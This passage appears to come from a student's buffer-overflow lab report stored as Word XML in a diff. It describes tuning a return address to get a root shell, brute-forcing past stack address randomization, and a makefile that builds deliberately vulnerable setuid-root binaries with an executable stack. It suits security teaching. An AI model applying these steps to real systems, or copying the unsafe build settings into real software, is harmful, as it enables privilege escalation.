+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I then modified the return address in the script to 0xffffcaa8 + 140 instead of 0xffffcaa8 + 136 and ran the program again. This time, I managed to get the root shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="16">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1165860"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="15" name="Image15" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="15" name="Image15" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1165860"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="17">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>1165225</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1080135"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="16" name="Image16" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="16" name="Image16" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId17"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1080135"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+        <w:t>W</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>ith little modifications to the return address, I managed to successfully gain access to the root shell with the dash countermeasure in place.</w:t>
+      </w:r>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>8890</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>2736215</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4116070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="17" name="Image17" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="17" name="Image17" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4116070"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Task 06: Defeating Address Randomization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="1680845"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="18" name="Image18" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18" name="Image18" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="1680845"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> re-enabled the Kernel's stack address randomization and then tried to run the program again using the same generated badfile from Task 05. As the screenshot shows above, I got a segmentation fault. This is due to the kernels address randomization.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I will now try to defeat the address randomization countermeasure. This involves using the brute force script to systematically try addresses so that hopefully we can run our badfile.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="20">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-60960</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6332220" cy="4116070"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="19" name="Image19" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="19" name="Image19" descr="" title=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6332220" cy="4116070"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>s the screenshot shows, it took 36 seconds to get the root shell. 27591 attempts were made.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Task 07: Experimenting with Other Countermeasures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>Task 07-A: Turn on the StackGuard Protection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>I removed the -fno-stack-protector flag from the provided makefile. The new makefile now looks like this:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>FLAGS    = -z execstack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>FLAGS_32 = -m32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>TARGET   = stack-L1 stack-L2 stack-L3 stack-L4 stack-L1-dbg stack-L2-dbg stack-L3-dbg stack-L4-dbg</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L1 = 120</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L2 = 120</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L3 = 150</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>L4 = 10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>all: $(TARGET)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack-L1: stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L1) $(FLAGS) $(FLAGS_32) -o $@ stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>gcc -DBUF_SIZE=$(L1) $(FLAGS) $(FLAGS_32) -g -o $@-dbg stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sudo chown root $@ &amp;&amp; sudo chmod 4755 $@</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stack-L2: stack.c</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:widowControl/>
+        <w:suppressAutoHyphens w:val="true"/>
+        <w:bidi w:val="0"/>
+        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
+        <w:ind w:start="720" w:end="0" w:hanging="0"/>
+        <w:jc w:val="start"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
